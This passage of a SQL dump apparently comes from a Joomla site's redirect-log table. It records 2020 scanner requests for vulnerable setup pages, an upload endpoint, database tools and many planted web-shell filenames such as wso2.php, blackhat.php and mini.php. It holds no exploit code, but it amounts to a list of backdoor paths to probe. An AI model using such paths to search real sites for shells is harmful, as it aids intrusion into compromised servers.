00:00:00',301),(24430,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/index.php/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/index.php/component/users/?view=registration','',2,0,'2020-04-29 03:14:30','0000-00-00 00:00:00',301),(24431,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/component/users/?view=registration','',2,0,'2020-04-29 03:14:31','0000-00-00 00:00:00',301),(24432,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php?option=com_user&view=register',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php?option=com_user&view=register','',3,0,'2020-04-29 03:14:32','0000-00-00 00:00:00',301),(24433,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/index.php?option=com_user&view=register',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/index.php?option=com_user&view=register','',2,0,'2020-04-29 03:14:32','0000-00-00 00:00:00',301),(24434,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/component/users/?view=registration','',2,0,'2020-04-29 03:14:33','0000-00-00 00:00:00',301),(24435,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/index.php/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/index.php/component/users/?view=registration','',2,0,'2020-04-29 03:14:33','0000-00-00 00:00:00',301),(24436,'http://www.3s-technologies.com.tr/tr/zsxiyovels.html',NULL,'','',1,0,'2020-04-29 04:35:48','0000-00-00 00:00:00',301),(24437,'http://3s-technologies.com.tr/tr/civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',2,0,'2020-04-29 08:40:55','0000-00-00 00:00:00',301),(24438,'http://3s-technologies.com.tr/tr/wp-includes/css/buttons.css',NULL,'','',46,0,'2020-04-29 19:43:42','0000-00-00 00:00:00',301),(24439,'http://3s-technologies.com.tr/tr/images/vuln.txt',NULL,'','',1,0,'2020-04-30 00:06:01','0000-00-00 00:00:00',301),(24440,'http://3s-technologies.com.tr/tr/ddzfdpzpwthjrev.html',NULL,'','',1,0,'2020-04-30 04:31:25','0000-00-00 00:00:00',301),(24441,'http://www.3s-technologies.com.tr/tr/router.php',NULL,'','',5,0,'2020-05-02 12:10:39','0000-00-00 00:00:00',301),(24442,'http://3s-technologies.com.tr/en/downloader',NULL,'','',1,0,'2020-05-02 12:18:48','0000-00-00 00:00:00',301),(24443,'http://3s-technologies.com.tr/en/admin',NULL,'','',37,0,'2020-05-02 12:18:51','0000-00-00 00:00:00',301),(24444,'http://3s-technologies.com.tr/tr/testwp/wp-admin/setup-config.php',NULL,'','',1,0,'2020-05-03 04:29:53','0000-00-00 00:00:00',301),(24445,'http://3s-technologies.com.tr/tr/testwordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2020-05-03 04:29:58','0000-00-00 00:00:00',301),(24446,'http://3s-technologies.com.tr/tr/new/wp-admin/setup-config.php',NULL,'','',5,0,'2020-05-03 04:30:07','0000-00-00 00:00:00',301),(24447,'http://3s-technologies.com.tr/tr/main/wp-admin/setup-config.php',NULL,'','',2,0,'2020-05-03 04:30:16','0000-00-00 00:00:00',301),(24448,'http://3s-technologies.com.tr/tr/backup/wp-admin/setup-config.php',NULL,'','',5,0,'2020-05-03 04:30:20','0000-00-00 00:00:00',301),(24449,'http://3s-technologies.com.tr/tr/demo/wp-admin/setup-config.php',NULL,'','',3,0,'2020-05-03 04:30:25','0000-00-00 00:00:00',301),(24450,'http://3s-technologies.com.tr/tr/home/wp-admin/setup-config.php',NULL,'','',2,0,'2020-05-03 04:30:30','0000-00-00 00:00:00',301),(24451,'http://3s-technologies.com.tr/tr/temp/wp-admin/setup-config.php',NULL,'','',1,0,'2020-05-03 04:30:35','0000-00-00 00:00:00',301),(24452,'http://3s-technologies.com.tr/tr/wp1/wp-admin/setup-config.php',NULL,'','',1,0,'2020-05-03 04:30:39','0000-00-00 00:00:00',301),(24453,'http://3s-technologies.com.tr/tr/wp2/wp-admin/setup-config.php',NULL,'','',1,0,'2020-05-03 04:30:43','0000-00-00 00:00:00',301),(24454,'http://3s-technologies.com.tr/tr/v1/wp-admin/setup-config.php',NULL,'','',3,0,'2020-05-03 04:30:54','0000-00-00 00:00:00',301),(24455,'http://3s-technologies.com.tr/tr/v2/wp-admin/setup-config.php',NULL,'','',3,0,'2020-05-03 04:30:58','0000-00-00 00:00:00',301),(24456,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2020-05-04 01:11:02','0000-00-00 00:00:00',301),(24457,'http://3s-technologies.com.tr/tr/modules/mod_ppc_simple_spotlight/img/tired.jpg',NULL,'','',1,0,'2020-05-04 20:19:13','0000-00-00 00:00:00',301),(24458,'http://www.3s-technologies.com.tr/tr/hpvnvrslbit.html',NULL,'','',1,0,'2020-05-05 14:52:27','0000-00-00 00:00:00',301),(24459,'http://3s-technologies.com.tr/tr/new/wp-login.php',NULL,'http://3s-technologies.com.tr/new/wp-login.php','',4,0,'2020-05-06 11:44:38','0000-00-00 00:00:00',301),(24460,'http://3s-technologies.com.tr/tr/wyyxlwsqzfacq.html',NULL,'','',1,0,'2020-05-06 14:30:03','0000-00-00 00:00:00',301),(24461,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_300x300.jpg',NULL,'','',7,0,'2020-05-06 16:31:49','0000-00-00 00:00:00',301),(24462,'http://3s-technologies.com.tr/tr/home/wp-login.php',NULL,'http://3s-technologies.com.tr/home/wp-login.php','',2,0,'2020-05-06 16:51:27','0000-00-00 00:00:00',301),(24463,'http://3s-technologies.com.tr/tr/wso2.php',NULL,'3s-technologies.com.tr/wso2.php','',49,0,'2020-05-06 19:13:09','0000-00-00 00:00:00',301),(24464,'http://3s-technologies.com.tr/tr/blackhat.php',NULL,'3s-technologies.com.tr/blackhat.php','',13,0,'2020-05-06 19:13:16','0000-00-00 00:00:00',301),(24465,'http://3s-technologies.com.tr/tr/components/com_wrapper/links.php',NULL,'3s-technologies.com.tr/components/com_wrapper/links.php','',3,0,'2020-05-06 19:39:12','0000-00-00 00:00:00',301),(24466,'http://3s-technologies.com.tr/tr/wp-admin/network/sitenet.php5',NULL,'3s-technologies.com.tr/wp-admin/network/sitenet.php5','',6,0,'2020-05-06 19:40:05','0000-00-00 00:00:00',301),(24467,'http://3s-technologies.com.tr/tr/modules/mod_footer/tmpl/index.php',NULL,'3s-technologies.com.tr/modules/mod_footer/tmpl/index.php','',13,0,'2020-05-06 19:40:16','0000-00-00 00:00:00',301),(24468,'http://3s-technologies.com.tr/tr/templates/beez3/content-post.php',NULL,'http://site.ru','',2,0,'2020-05-06 19:48:12','0000-00-00 00:00:00',301),(24469,'http://3s-technologies.com.tr/tr/templates/protostar/content-post.php',NULL,'http://site.ru','',2,0,'2020-05-06 20:12:54','0000-00-00 00:00:00',301),(24470,'http://3s-technologies.com.tr/tr/blackhat.php.suspected',NULL,'http://site.ru','',11,0,'2020-05-06 20:12:54','0000-00-00 00:00:00',301),(24471,'http://3s-technologies.com.tr/tr/test/blackhat.php',NULL,'http://site.ru','',3,0,'2020-05-06 20:42:21','0000-00-00 00:00:00',301),(24472,'http://3s-technologies.com.tr/tr/test/blackhat.php',NULL,'http://site.ru','',1,0,'2020-05-06 20:42:21','0000-00-00 00:00:00',301),(24473,'http://3s-technologies.com.tr/tr/components/com_users/user.php',NULL,'http://site.ru','',4,0,'2020-05-06 20:59:28','0000-00-00 00:00:00',301),(24474,'http://3s-technologies.com.tr/tr/_cache/blackhat.php',NULL,'http://site.ru','',4,0,'2020-05-06 21:00:34','0000-00-00 00:00:00',301),(24475,'http://3s-technologies.com.tr/tr/timco-aero.com/cache/blackhat.php',NULL,'http://site.ru','',2,0,'2020-05-06 21:47:58','0000-00-00 00:00:00',301),(24476,'http://3s-technologies.com.tr/tr/modules/mod_insider/mod_insider.php',NULL,'http://site.ru','',6,0,'2020-05-06 21:52:12','0000-00-00 00:00:00',301),(24477,'http://3s-technologies.com.tr/tr/templates/protostar/blackhat.php',NULL,'http://site.ru','',4,0,'2020-05-06 22:11:38','0000-00-00 00:00:00',301),(24478,'http://3s-technologies.com.tr/tr/web/blackhat.php',NULL,'http://site.ru','',2,0,'2020-05-06 22:35:33','0000-00-00 00:00:00',301),(24479,'http://3s-technologies.com.tr/tr/prov/content-post.php',NULL,'http://site.ru','',2,0,'2020-05-06 22:37:46','0000-00-00 00:00:00',301),(24480,'http://3s-technologies.com.tr/tr/wp-admin/network/sitenet.php5.suspected',NULL,'http://site.ru','',3,0,'2020-05-06 23:01:30','0000-00-00 00:00:00',301),(24481,'http://3s-technologies.com.tr/tr/cache/ruf.php5',NULL,'http://site.ru','',3,0,'2020-05-07 00:37:36','0000-00-00 00:00:00',301),(24482,'http://3s-technologies.com.tr/tr/administrator/conf.php',NULL,'http://site.ru','',2,0,'2020-05-07 00:40:47','0000-00-00 00:00:00',301),(24483,'http://3s-technologies.com.tr/tr/network/content-post.php',NULL,'http://site.ru','',7,0,'2020-05-07 00:59:50','0000-00-00 00:00:00',301),(24484,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/nyet.gif',NULL,'','',1,0,'2020-05-07 01:21:01','0000-00-00 00:00:00',301),(24485,'http://3s-technologies.com.tr/tr/feal.php',NULL,'http://site.ru','',4,0,'2020-05-07 02:10:15','0000-00-00 00:00:00',301),(24486,'http://3s-technologies.com.tr/tr/feal.php',NULL,'http://site.ru','',1,0,'2020-05-07 02:10:15','0000-00-00 00:00:00',301),(24487,'http://3s-technologies.com.tr/tr/web/cache/simple.php5',NULL,'http://site.ru','',2,0,'2020-05-07 02:46:00','0000-00-00 00:00:00',301),(24488,'http://3s-technologies.com.tr/tr/layouts/simple.php5',NULL,'http://site.ru','',4,0,'2020-05-07 02:56:15','0000-00-00 00:00:00',301),(24489,'http://3s-technologies.com.tr/tr/wp-site.php',NULL,'http://site.ru','',10,0,'2020-05-07 03:20:37','0000-00-00 00:00:00',301),(24490,'http://3s-technologies.com.tr/tr/mini.php',NULL,'http://site.ru','',264,0,'2020-05-07 04:06:38','0000-00-00 00:00:00',301),(24491,'http://3s-technologies.com.tr/tr/simple.php5',NULL,'http://site.ru','',16,0,'2020-05-07 04:06:58','0000-00-00 00:00:00',301),(24492,'http://3s-technologies.com.tr/tr/wp-admin/network/sitenets.php5',NULL,'http://site.ru','',3,0,'2020-05-07 04:06:58','0000-00-00 00:00:00',301),(24493,'http://3s-technologies.com.tr/tr/test/content-post.php',NULL,'http://site.ru','',1,0,'2020-05-07 04:52:33','0000-00-00 00:00:00',301),(24494,'http://3s-technologies.com.tr/tr/wool.php',NULL,'http://site.ru','',24,0,'2020-05-07 05:39:19','0000-00-00 00:00:00',301),(24495,'http://3s-technologies.com.tr/tr/cache/ix.php.php',NULL,'http://site.ru','',4,0,'2020-05-07 06:02:39','0000-00-00 00:00:00',301),(24496,'http://3s-technologies.com.tr/tr/cache/ix.php.php',NULL,'http://site.ru','',1,0,'2020-05-07 06:02:39','0000-00-00 00:00:00',301),(24497,'http://3s-technologies.com.tr/tr/prov/blackhat.php',NULL,'http://site.ru','',2,0,'2020-05-07 08:04:54','0000-00-00 00:00:00',301),(24498,'http://3s-technologies.com.tr/tr/timco-aero.com/cache/simple.php5.suspected',NULL,'http://site.ru','',2,0,'2020-05-07 08:28:44','0000-00-00 00:00:00',301),(24499,'http://3s-technologies.com.tr/en/adminer.php',NULL,'3s-technologies.com.tr','',3,0,'2020-05-07 10:58:00','0000-00-00 00:00:00',301),(24500,'http://3s-technologies.com.tr/en/mysql-adminer.php',NULL,'3s-technologies.com.tr','',1,0,'2020-05-07 10:58:13','0000-00-00 00:00:00',301),(24501,'http://3s-technologies.com.tr/en/adminer/index.php',NULL,'3s-technologies.com.tr','',1,0,'2020-05-07 10:59:41','0000-00-00 00:00:00',301),(24502,'http://3s-technologies.com.tr/tr/components/com_config/controller/images.php',NULL,'http://site.ru','',8,0,'2020-05-07 11:19:30','0000-00-00 00:00:00',301),(24503,'http://3s-technologies.com.tr/tr/cache/wp-console.php',NULL,'http://site.ru','',2,0,'2020-05-07 11:47:55','0000-00-00 00:00:00',301),(24504,'http://3s-technologies.com.tr/tr/img.php',NULL,'http://site.ru','',43,0,'2020-05-07 12:53:38','0000-00-00 00:00:00',301),(24505,'http://3s-technologies.com.tr/tr/administrator/templates/isis/simple.php5.suspected',NULL,'http://site.ru','',2,0,'2020-05-07 13:18:13','0000-00-00 00:00:00',301),(24506,'http://www.3s-technologies.com.tr/tr/e/data/js/ajax.js',NULL,'','',13,0,'2020-05-07 19:51:43','0000-00-00 00:00:00',301),(24507,'http://www.3s-technologies.com.tr/en/shop',NULL,'','',1,0,'2020-05-07 20:51:56','0000-00-00 00:00:00',301),(24508,'http://www.3s-technologies.com.tr/en/admin/view/javascript/common.js',NULL,'','',1,0,'2020-05-07 20:51:58','0000-00-00 00:00:00',301),(24509,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/1998.gif',NULL,'','',1,0,'2020-05-07 22:31:40','0000-00-00 00:00:00',301),(24510,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/xd.gif',NULL,'','',2,0,'2020-05-08 16:59:50','0000-00-00 00:00:00',301),(24511,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/zxcvbnm.gif',NULL,'','',1,0,'2020-05-08 22:07:17','0000-00-00 00:00:00',301),(24512,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/yunus.gif',NULL,'','',1,0,'2020-05-09 00:01:36','0000-00-00 00:00:00',301),(24513,'http://3s-technologies.com.tr/tr/ganteng.gif',NULL,'','',1,0,'2020-05-09 07:07:00','0000-00-00 00:00:00',301),(24514,'http://3s-technologies.com.tr/tr/images/0wn.txt',NULL,'','',1,0,'2020-05-09 11:38:10','0000-00-00 00:00:00',301),(24515,'http://3s-technologies.com.tr/tr/images/vezl.txt',NULL,'','',1,0,'2020-05-09 12:16:15','0000-00-00 00:00:00',301),(24516,'http://3s-technologies.com.tr/tr/images/nyet.gif',NULL,'','',1,0,'2020-05-09 13:29:00','0000-00-00 00:00:00',301),(24517,'http://3s-technologies.com.tr/tr/images/ganteng.gif',NULL,'','',2,0,'2020-05-09 14:52:32','0000-00-00 00:00:00',301),(24518,'http://3s-technologies.com.tr/tr/hacked.gif',NULL,'','',1,0,'2020-05-09 21:00:22','0000-00-00 00:00:00',301),(24519,'http://3s-technologies.com.tr/tr/qq.gif',NULL,'','',1,0,'2020-05-10 00:19:42','0000-00-00 00:00:00',301),(24520,'http://3s-technologies.com.tr/tr/components/com_gmapfp/libraries/map.js',NULL,'','',2,0,'2020-05-10 02:30:08','0000-00-00 00:00:00',301),(24521,'http://3s-technologies.com.tr/tr/plugins/content/pagenavigation/tmpl/config.php',NULL,'http://site.ru','',1,0,'2020-05-10 16:39:07','0000-00-00 00:00:00',301),(24522,'http://3s-technologies.com.tr/tr/site-old/content-post.php',NULL,'http://site.ru','',1,0,'2020-05-10 16:39:10','0000-00-00 00:00:00',301),(24523,'http://3s-technologies.com.tr/tr/cache/wp-console.php.suspected',NULL,'http://site.ru','',8,0,'2020-05-10 16:40:05','0000-00-00 00:00:00',301),(24524,'http://3s-technologies.com.tr/tr/modules/mod_insider/ruf.php5',NULL,'http://site.ru','',4,0,'2020-05-10 16:42:16','0000-00-00 00:00:00',301),(24525,'http://3s-technologies.com.tr/tr/libraries/joomla/template/midou.php',NULL,'http://site.ru','',6,0,'2020-05-10 17:03:18','0000-00-00 00:00:00',301),(24526,'http://3s-technologies.com.tr/tr/components/com_k2/models/config.php',NULL,'http://site.ru','',1,0,'2020-05-10 17:03:56','0000-00-00 00:00:00',301),(24527,'http://3s-technologies.com.tr/tr/libraries/legacy/exception/cache.php',NULL,'http://site.ru','',2,0,'2020-05-10 17:03:57','0000-00-00 00:00:00',301),(24528,'http://3s-technologies.com.tr/tr/components/com_easyblog.backup/themes/nickel/blogs/latest/include.php',NULL,'http://site.ru','',1,0,'2020-05-10 17:04:02','0000-00-00 00:00:00',301),(24529,'http://3s-technologies.com.tr/tr/administrator/components/com_jce/sql/components.php',NULL,'http://site.ru','',2,0,'2020-05-10 17:28:15','0000-00-00 00:00:00',301),(24530,'http://3s-technologies.com.tr/tr/components/com_wrapper/views/configure.php',NULL,'http://site.ru','',1,0,'2020-05-10 17:28:29','0000-00-00 00:00:00',301),(24531,'http://3s-technologies.com.tr/tr/wp-content/plugins/redirection/page/wp-contentt.php',NULL,'http://site.ru','',2,0,'2020-05-10 17:28:45','0000-00-00 00:00:00',301),(24532,'http://3s-technologies.com.tr/tr/images/banners/images.php',NULL,'http://site.ru','',5,0,'2020-05-10 17:28:46','0000-00-00 00:00:00',301),(24533,'http://3s-technologies.com.tr/tr/modules/mod_articles_news/tmpl/components.php',NULL,'http://site.ru','',1,0,'2020-05-10 17:28:54','0000-00-00 00:00:00',301),(24534,'http://3s-technologies.com.tr/tr/administrator/components/com_k2/views/settings/class-library.php',NULL,'http://site.ru','',1,0,'2020-05-10 17:53:06','0000-00-00 00:00:00',301),(24535,'http://3s-technologies.com.tr/tr/libraries/cms/layout/bag.php',NULL,'http://site.ru','',1,0,'2020-05-10 18:17:51','0000-00-00 00:00:00',301),(24536,'http://3s-technologies.com.tr/tr/site-old/cache/content-post.php',NULL,'http://site.ru','',1,0,'2020-05-10 18:17:57','0000-00-00 00:00:00',301),(24537,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_newsfeeds/menus.php',NULL,'http://site.ru','',1,0,'2020-05-10 18:18:56','0000-00-00 00:00:00',301),(24538,'http://3s-technologies.com.tr/tr/components/com_jce/editor/extensions/aggregator/youtube/tmpl/include.php',NULL,'http://site.ru','',1,0,'2020-05-10 18:19:08','0000-00-00 00:00:00',301),(24539,'http://3s-technologies.com.tr/tr/components/com_contact/views/contact/beautifu.php',NULL,'http://site.ru','',1,0,'2020-05-10 18:23:50','0000-00-00 00:00:00',301),(24540,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/groups/include.php',NULL,'http://site.ru','',1,0,'2020-05-10 18:43:09','0000-00-00 00:00:00',301),(24541,'http://3s-technologies.com.tr/tr/wp_activate.php.suspected',NULL,'http://site.ru','',3,0,'2020-05-10 18:43:19','0000-00-00 00:00:00',301),(24542,'http://3s-technologies.com.tr/tr/images/banners/theme.php',NULL,'http://site.ru','',3,0,'2020-05-10 19:07:39','0000-00-00 00:00:00',301),(24543,'http://3s-technologies.com.tr/tr/wp-defence.php',NULL,'http://site.ru','',2,0,'2020-05-10 19:07:40','0000-00-00 00:00:00',301),(24544,'http://3s-technologies.com.tr/tr/components/com_jevents/views/ext/jevent/tmpl/settings.php',NULL,'http://site.ru','',1,0,'2020-05-10 19:08:28','0000-00-00 00:00:00',301),(24545,'http://3s-technologies.com.tr/tr/index2.php',NULL,'http://site.ru','',18,0,'2020-05-10 19:08:36','0000-00-00 00:00:00',301),(24546,'http://3s-technologies.com.tr/tr/components/com_contact/views/category/tmpl/fail_logs.php',NULL,'http://site.ru','',3,0,'2020-05-10 19:09:58','0000-00-00 00:00:00',301),(24547,'http://3s-technologies.com.tr/tr/ptdktd.php.suspected',NULL,'http://site.ru','',1,0,'2020-05-10 19:10:52','0000-00-00 00:00:00',301),(24548,'http://3s-technologies.com.tr/tr/site-old/simple.php5',NULL,'http://site.ru','',1,0,'2020-05-10 19:32:27','0000-00-00 00:00:00',301),(24549,'http://3s-technologies.com.tr/tr/components/admin.php',NULL,'http://site.ru','',4,0,'2020-05-10 19:32:30','0000-00-00 00:00:00',301),(24550,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/lux.php',NULL,'http://site.ru','',2,0,'2020-05-10 19:33:26','0000-00-00 00:00:00',301),(24551,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordfence/url/cach/classes/model/wp-pingg.php',NULL,'http://site.ru','',1,0,'2020-05-10 19:40:19','0000-00-00 00:00:00',301),(24552,'http://3s-technologies.com.tr/tr/wp-blogs.php',NULL,'http://site.ru','',60,0,'2020-05-10 19:56:44','0000-00-00 00:00:00',301),(24553,'http://3s-technologies.com.tr/tr/.wp-trc.php',NULL,'http://site.ru','',5,0,'2020-05-10 19:58:49','0000-00-00 00:00:00',301),(24554,'http://3s-technologies.com.tr/tr/libraries/cms/pagination/gank.php.php',NULL,'http://site.ru','',3,0,'2020-05-10 20:01:12','0000-00-00 00:00:00',301),(24555,'http://3s-technologies.com.tr/tr/meuhy.php',NULL,'http://site.ru','',5,0,'2020-05-10 20:20:19','0000-00-00 00:00:00',301),(24556,'http://3s-technologies.com.tr/tr/components/com_tags/views/tag/bag.php',NULL,'http://site.ru','',1,0,'2020-05-10 20:20:20','0000-00-00 00:00:00',301),(24557,'http://3s-technologies.com.tr/tr/libraries/fof/less/parser/admin-class.php',NULL,'http://site.ru','',1,0,'2020-05-10 21:08:50','0000-00-00 00:00:00',301),(24558,'http://3s-technologies.com.tr/tr/wp-blog-mail.php',NULL,'http://site.ru','',7,0,'2020-05-10 21:11:38','0000-00-00 00:00:00',301),(24559,'http://3s-technologies.com.tr/tr/wp-backup.php',NULL,'http://site.ru','',7,0,'2020-05-10 21:30:56','0000-00-00 00:00:00',301),(24560,'http://3s-technologies.com.tr/tr/css/engl/css/config.php',NULL,'http://site.ru','',1,0,'2020-05-10 21:56:42','0000-00-00 00:00:00',301),(24561,'http://3s-technologies.com.tr/tr/components/com_contact/views/featured/tmpl/.h..php',NULL,'http://site.ru','',1,0,'2020-05-10 22:18:20','0000-00-00 00:00:00',301),(24562,'http://3s-technologies.com.tr/tr/tags.php',NULL,'http://site.ru','',5,0,'2020-05-10 22:35:24','0000-00-00 00:00:00',301),(24563,'http://3s-technologies.com.tr/tr/cache/doc.php',NULL,'http://site.ru','',8,0,'2020-05-10 22:42:27','0000-00-00 00:00:00',301),(24564,'http://3s-technologies.com.tr/tr/components/com_xmap/views/html/tmpl/wp-side.php',NULL,'http://site.ru','',1,0,'2020-05-11 00:41:07','0000-00-00 00:00:00',301),(24565,'http://3s-technologies.com.tr/tr/wp-cofigs.php',NULL,'http://site.ru','',4,0,'2020-05-11 01:05:24','0000-00-00 00:00:00',301),(24566,'http://3s-technologies.com.tr/tr/newsleter.php.suspected',NULL,'http://site.ru','',6,0,'2020-05-11 01:53:35','0000-00-00 00:00:00',301),(24567,'http://3s-technologies.com.tr/tr/wp-cofigs.php.suspected',NULL,'http://site.ru','',5,0,'2020-05-11 02:16:36','0000-00-00 00:00:00',301),(24568,'http://3s-technologies.com.tr/tr/libraries/cms/form/beautifu.php',NULL,'http://site.ru','',2,0,'2020-05-11 02:41:37','0000-00-00 00:00:00',301),(24569,'http://3s-technologies.com.tr/tr/components/com_xmap/views/streamed.php',NULL,'http://site.ru','',2,0,'2020-05-11 03:04:20','0000-00-00 00:00:00',301),(24570,'http://3s-technologies.com.tr/tr/templates/atomic/css/blueprint/src/images.php',NULL,'http://site.ru','',3,0,'2020-05-11 03:04:23','0000-00-00 00:00:00',301),(24571,'http://www.3s-technologies.com.tr/tr/contact.html',NULL,'','',2,0,'2020-05-11 03:17:27','0000-00-00 00:00:00',301),(24572,'http://www.3s-technologies.com.tr/tr/contact.htm',NULL,'','',2,0,'2020-05-11 03:17:27','0000-00-00 00:00:00',301),(24573,'http://www.3s-technologies.com.tr/tr/contact.php',NULL,'','',3,0,'2020-05-11 03:17:27','0000-00-00 00:00:00',301),(24574,'http://www.3s-technologies.com.tr/tr/contact.jsp',NULL,'','',2,0,'2020-05-11 03:17:28','0000-00-00 00:00:00',301),(24575,'http://www.3s-technologies.com.tr/tr/contact.aspx',NULL,'','',2,0,'2020-05-11 03:17:28','0000-00-00 00:00:00',301),(24576,'http://www.3s-technologies.com.tr/tr/contact.asp',NULL,'','',2,0,'2020-05-11 03:17:29','0000-00-00 00:00:00',301),(24577,'http://www.3s-technologies.com.tr/tr/contactus.html',NULL,'','',3,0,'2020-05-11 03:17:30','0000-00-00 00:00:00',301),(24578,'http://www.3s-technologies.com.tr/tr/contactus.htm',NULL,'','',2,0,'2020-05-11 03:17:31','0000-00-00 00:00:00',301),(24579,'http://www.3s-technologies.com.tr/tr/contactus.php',NULL,'','',3,0,'2020-05-11 03:17:31','0000-00-00 00:00:00',301),(24580,'http://www.3s-technologies.com.tr/tr/contactus.jsp',NULL,'','',2,0,'2020-05-11 03:17:32','0000-00-00 00:00:00',301),(24581,'http://www.3s-technologies.com.tr/tr/contactus.aspx',NULL,'','',2,0,'2020-05-11 03:17:32','0000-00-00 00:00:00',301),(24582,'http://www.3s-technologies.com.tr/tr/contactus.asp',NULL,'','',2,0,'2020-05-11 03:17:34','0000-00-00 00:00:00',301),(24583,'http://www.3s-technologies.com.tr/tr/contact_us.html',NULL,'','',2,0,'2020-05-11 03:17:35','0000-00-00 00:00:00',301),(24584,'http://www.3s-technologies.com.tr/tr/contact_us.htm',NULL,'','',2,0,'2020-05-11 03:17:36','0000-00-00 00:00:00',301),(24585,'http://www.3s-technologies.com.tr/tr/contact_us.php',NULL,'','',2,0,'2020-05-11 03:17:37','0000-00-00 00:00:00',301),(24586,'http://www.3s-technologies.com.tr/tr/contact_us.jsp',NULL,'','',2,0,'2020-05-11 03:17:38','0000-00-00 00:00:00',301),(24587,'http://www.3s-technologies.com.tr/tr/contact_us.aspx',NULL,'','',2,0,'2020-05-11 03:17:43','0000-00-00 00:00:00',301),(24588,'http://www.3s-technologies.com.tr/tr/contact_us.asp',NULL,'','',2,0,'2020-05-11 03:17:45','0000-00-00 00:00:00',301),(24589,'http://www.3s-technologies.com.tr/tr/contact_us',NULL,'','',3,0,'2020-05-11 03:17:46','0000-00-00 00:00:00',301),(24590,'http://www.3s-technologies.com.tr/tr/contacts.html',NULL,'','',2,0,'2020-05-11 03:17:46','0000-00-00 00:00:00',301),(24591,'http://www.3s-technologies.com.tr/tr/contacts.htm',NULL,'','',2,0,'2020-05-11 03:17:47','0000-00-00 00:00:00',301),(24592,'http://www.3s-technologies.com.tr/tr/contacts.php',NULL,'','',2,0,'2020-05-11 03:17:47','0000-00-00 00:00:00',301),(24593,'http://www.3s-technologies.com.tr/tr/contacts.jsp',NULL,'','',2,0,'2020-05-11 03:17:50','0000-00-00 00:00:00',301),(24594,'http://www.3s-technologies.com.tr/tr/contacts.aspx',NULL,'','',2,0,'2020-05-11 03:17:53','0000-00-00 00:00:00',301),(24595,'http://www.3s-technologies.com.tr/tr/contacts.asp',NULL,'','',2,0,'2020-05-11 03:17:53','0000-00-00 00:00:00',301),(24596,'http://www.3s-technologies.com.tr/tr/contact-us.htm',NULL,'','',2,0,'2020-05-11 03:17:56','0000-00-00 00:00:00',301),(24597,'http://www.3s-technologies.com.tr/tr/contact-us.php',NULL,'','',2,0,'2020-05-11 03:17:57','0000-00-00 00:00:00',301),(24598,'http://www.3s-technologies.com.tr/tr/contact-us.jsp',NULL,'','',2,0,'2020-05-11 03:17:57','0000-00-00 00:00:00',301),(24599,'http://www.3s-technologies.com.tr/tr/contact-us.aspx',NULL,'','',2,0,'2020-05-11 03:17:58','0000-00-00 00:00:00',301),(24600,'http://www.3s-technologies.com.tr/tr/contact-us.asp',NULL,'','',2,0,'2020-05-11 03:17:59','0000-00-00 00:00:00',301),(24601,'http://3s-technologies.com.tr/tr/site-old/blackhat.php',NULL,'http://site.ru','',1,0,'2020-05-11 03:28:57','0000-00-00 00:00:00',301),(24602,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/inlinepopups/css/admin-class.php',NULL,'http://site.ru','',3,0,'2020-05-11 03:51:59','0000-00-00 00:00:00',301),(24603,'http://3s-technologies.com.tr/tr/plugins/search/k2/menus.php',NULL,'http://site.ru','',9,0,'2020-05-11 03:52:24','0000-00-00 00:00:00',301),(24604,'http://3s-technologies.com.tr/tr/libraries/cms/installer/manifest/.h..php',NULL,'http://site.ru','',4,0,'2020-05-11 03:52:33','0000-00-00 00:00:00',301),(24605,'http://3s-technologies.com.tr/tr/libraries/joomla/template/tools.php',NULL,'http://site.ru','',5,0,'2020-05-11 03:52:36','0000-00-00 00:00:00',301),(24606,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/mini.php',NULL,'http://site.ru','',1,0,'2020-05-11 04:16:54','0000-00-00 00:00:00',301),(24607,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/mini.php',NULL,'http://site.ru','',1,0,'2020-05-11 04:16:54','0000-00-00 00:00:00',301),(24608,'http://3s-technologies.com.tr/tr/assets/images/blackhat.php',NULL,'http://site.ru','',2,0,'2020-05-11 04:18:15','0000-00-00 00:00:00',301),(24609,'http://3s-technologies.com.tr/tr/components/com_media/mark.php',NULL,'http://site.ru','',5,0,'2020-05-11 16:50:23','0000-00-00 00:00:00',301),(24610,'http://3s-technologies.com.tr/tr/language/zh-cn/403.php',NULL,'http://site.ru','',2,0,'2020-05-11 16:50:24','0000-00-00 00:00:00',301),(24611,'http://3s-technologies.com.tr/tr/data.php',NULL,'http://site.ru','',77,0,'2020-05-11 16:50:49','0000-00-00 00:00:00',301),(24612,'http://3s-technologies.com.tr/tr/includes/class.php',NULL,'http://site.ru','',3,0,'2020-05-11 16:50:58','0000-00-00 00:00:00',301),(24613,'http://3s-technologies.com.tr/tr/seter.php.suspected',NULL,'http://site.ru','',8,0,'2020-05-11 17:39:55','0000-00-00 